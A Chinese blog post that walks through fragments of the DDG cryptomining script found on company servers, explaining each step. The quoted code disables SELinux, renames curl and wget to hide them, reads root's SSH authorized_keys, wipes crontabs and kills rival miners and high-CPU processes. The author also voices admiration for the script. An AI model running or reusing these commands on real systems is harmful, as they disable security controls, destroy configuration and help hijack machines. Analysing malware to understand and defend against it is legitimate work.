一个“挖矿脚本”还能难得住我？ _挖矿脚本

公司有几台机器，最近 CPU 一直在疯转，就像是吃了药，一直在发热。由于机器实在是太多，有这么几台安全性防护没有到位，就一直躺在角落里疯狂运转。

文章插图
图片来自 Pexels
直到统一的监控脚本接管了这几台机器，异常情况才得以浮出水面。最后发现了多个奇奇怪怪的进程，发现是一个挖矿脚本。
下载下来学习了一下，发现脚本的编写者，有着较高的水平。虽然在别人机器进行挖矿行为是不道德的，但掩盖不了脚本编写者的风骚操作。
挖矿，是计算机技术界最让人迷惑的行为之一，但它赚钱。据悉，这段脚本名叫 DDG，已经挖取了价值一千多万人民币的虚拟币货币。
本着学习的目的，我稍微分析了一下这个神奇的脚本，也算是吸尽它的精华，为我所用。
这事我都没敢告诉老板，因为说了他也不懂，反生事端。不过和大家交流一下还是可以的，因为你们懂啊。
01.Code 1
#!/bin/sh 脚本的第一行，看起来是一行注释，但其实并不是。它规定了接下来的脚本，将要采用哪一个 SHELL 执行。
像我们平常用的 bash、zsh 等，属于 sh 的超集，这个脚本使用 sh 作为执行的 shell，具有更好的可移植性。
02.Code 2
setenforce 0 2>dev/null echo SElinux=disabled > /etc/sysconfig/selinux 2>/dev/null setenforce 是 Linux 的 selinux 防火墙配置命令，执行 setenforce 0 表示关闭 selinux 防火墙。2 代表的是标准错误(stderr)的意思。
所以后面，使用重定向符，将命令的错误输出定向到 /dev/null 设备中。这个设备是一个虚拟设备，意思是什么都不干。非常适合静悄悄的干坏事。
03.Code 3
sync && echo 3 >/proc/sys/vm/drop_caches 脚本贴心的帮我们释放了一些内存资源，以便获取更多的资源进行挖矿。
众所周知，Linux 系统会随着长时间的运行，会产生很多缓存，清理方式就是写一个数字到 drop_caches 文件里，这个数字通常为 3 。
sync 命令将所有未写的系统缓冲区写到磁盘中，执行之后就可以放心的释放缓存了。
04.Code 4

crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur

没错，上面这些语句就是完成了一些普通的操作。值得注意的是，它把我们的一些常用命令，使用 mv 命令给重名了。
这在执行命令的时候，就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件，属于犯罪的范畴了。
脚本为了复用一些功能，抽象出了很多的函数。我们直接跳到 main 函数的执行，然后看一下这个过程。
05.Code 5
首先是 kill_miner_proc 函数。代码很长，就不全部贴出来了。

kill_miner_proc() {ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9...pkill -f bIOSetjenkinspkill -f Loopback...crontab -rrm -rf /var/spool/cron/*

挖矿领域是一个相爱相杀的领域。这个方法首先使用 ps、grep、kill 一套组合，干掉了同行的挖矿脚本，然后停掉了同行的 cron 脚本，黑吃黑的感觉。
在这段脚本里，使用了 pkill 命令。这个命令会终止进程，并按终端号踢出用户，比较暴力。
06.Code 6
接下来执行的是 kill_sus_proc 函数。
ps axf -o "pid"|while read procid do ... done ps 加上 o 参数，可以指定要输出的列，在这里只输出的进程的 pid，然后使用 read 函数，对 procid 进行遍历操作。
07.Code 7
ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then ... fi 上面就是遍历操作过程了，我们可以看到 if 语句的语法。其中 $? 指的是上一个命令的退出状态。
0 表示没有错误，其他任何值表明有错误。-ne 是不等于的意思，意思就是能够匹配到 tmp 这个字符串。
08.Code 8
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do ... done 呵呵，上面又来了一次循环遍历。不过这次针对的目标，是 CPU 使用超过 40% 的进程。这就有点狠了：影响我挖矿的进程，都得死!相煎何太急。